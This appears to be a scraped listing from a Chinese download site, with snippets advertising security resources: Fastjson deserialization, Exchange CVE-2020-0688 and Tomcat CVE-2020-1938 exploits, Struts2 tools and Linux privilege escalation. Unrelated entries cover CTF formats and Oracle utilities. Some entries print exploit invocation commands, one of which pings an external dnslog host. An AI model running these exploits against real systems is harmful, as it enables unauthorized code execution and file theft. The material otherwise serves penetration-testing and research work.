![img](https://github.com/mai-lang-chai/Middleware-Vulnerability-detection/blob/master/Fastjson/Fastjson%E5%90%84%E7%89%88%E6%9C%AC%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E6%B1%87%E6%80%BB/PIC/index.png) # Fastjson<=1.2.47反序列化漏洞为例 1、此时/tmp目录 ![img](https://github.com/mai-lang-chai/Middleware-Vulnerability-detection/blob/master/Fastjson/Fastjson%E5%90%84%E7%89%88%E6%9C%AC%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E6%B1%87%E6%80%BB/PIC/tmp.png) 2、编译Exploit.java javac
2022-04-06 00:16:07 36.95MB Fastjson 安全漏洞 反序列化漏洞
# CVE-2020-0688 Exchange RCE 前提: 已知一个域用户 影响版本: -Microsoft Exchange Server 2010 Service Pack 3 Update Rollup 30 -Microsoft Exchange Server 2013 Cumulative Update 23 -Microsoft Exchange Server 2016 Cumulative Update 15 -Microsoft Exchange Server 2019 Cumulative Update 4 exp1: [@Ridter](https://github.com/Ridter/cve-2020-0688) ``` python cve-2020-0688.py -s https://ip/owa/ -u user -p pass -c "ping test.ph4nxq.dnslog.cn" ``` exp2: [@zcgonvh](https://github.com/zcgonvh/CVE-2020-068
2022-04-06 00:16:06 35KB Exchange 安全漏洞 exp
# CVE-2020-1938 Apache Tomcat 文件包含 影响版本: Tomcat6-9 Exp: ``` python CNVD-2020-10487-Tomcat-Ajp-lfi.py x.x.x.x -p 8009 -f urfile 一. 漏洞概述 2月20日,国家信息安全漏洞共享平台(CNVD)发布了Apache Tomcat文件包含漏洞(CNVD-2020-10487/CVE-2020-1938)。该漏洞是由于Tomcat AJP协议存在缺陷而导致,攻击者利用该漏洞可通过构造特定参数,读取服务器webapp下的任意文件。若目标服务器同时存在文件上传功能,攻击者可进一步实现远程代码执行。目前,厂商已发布新版本完成漏洞修复。 Tomcat是Apache软件基金会中的一个重要项目,性能稳定且免费,是目前较为流行的Web应用服务器。由于Tomcat应用范围较广,因此本次通告的漏洞影响范围较大,请相关用户及时采取防护措施修复此漏洞。 参考链接: https://www.cnvd.org.cn/webinfo/show/5415 二、影响范围
2022-04-06 00:16:04 480KB tomcat apache java EXP
CTF竞赛模式具体分为以下三类: 一、解题模式(Jeopardy) 在解题模式CTF赛制中,参赛队伍可以通过互联网或者现场网络参与,这种模式的CTF竞赛与ACM编程竞赛、信息学奥赛比较类似,以解决网络安全技术挑战题目的分值和时间来排名,通常用于在线选拔赛。题目主要包含逆向、漏洞挖掘与利用、Web渗透、密码、取证、隐写、安全编程等类别。 二、攻防模式(Attack-Defense) 在攻防模式CTF赛制中,参赛队伍在网络空间互相进行攻击和防守,挖掘网络服务漏洞并攻击对手服务来得分 三、混合模式(Mix) 结合了解题模式与攻防模式的CTF赛制,比如参赛队伍通过解题可以获取一些初始分数,然后通过攻防对抗进行得分增减的零和游戏,最终以得分高低分出胜负。采用混合模式CTF赛制的典型代表如iCTF国际CTF竞赛。 资源包括工匠杯比赛的三道题目和exp,并详细写出了解题思路。
2022-04-06 00:13:40 1.92MB CTF CTF比赛 CTF题目 CTF解题思路
1
K8_Struts2_EXP+S2-045+&+任意文件上传+20170309,struts安全漏洞扫描工具。
2022-04-02 20:51:06 461KB k8 struts2
1
Struts2漏洞利用工具
2022-03-25 21:04:09 1.44MB K8_
1
oracle11g数据库三种方式导入导出必备的exe文件:exp.exe imp.exe sqlplus.exe,有了这三个文件,就可以轻松的进行oracle数据库的导入导出。
2022-03-22 17:53:25 549KB exp.exe imp.exe sqlplus.exe
1
Middleware-Vulnerability-detection 实时更新较好用最新漏洞EXP,仅供已授权渗透测试使用 2020.4.18项目迎来两位伙伴一起维护 @caizhuang :beer_mug::beer_mug::beer_mug: @3ND:beer_mug::beer_mug::beer_mug: Apache --2019 Apache-flink 未授权访问任意 --2019 CVE-2019-0193 Apache Solr via Velocity template RCE --2020.3 CVE-2019-17564 Apache Dubbo反序列化漏洞 --2020.7 CVE-2020-13925 Apache Kylin 远程命令执行漏洞 --2020.10 CVE-2020-13957 Apache Solr 未授权上传 --2020.11 CVE-2020-13942 Apache Unomi 远程代码执行 Cacti --2020.2 CVE-202
2022-03-18 09:17:45 231.54MB python poc cve exp
1
H.264/AVC中Exp-Golomb指数哥伦布编码详解(含编码和解码),使用C语言实现,另有与之匹配详解文章,请查阅微信公众号:金架构
2022-03-15 22:18:12 5KB H.264/AVC Exp-Golomb
1
Linux常见提权总结包括(内核漏洞提权、suid提权、定时任务提权、sudo提权等等)
2022-03-13 14:22:44 12.63MB linux 运维 提权
1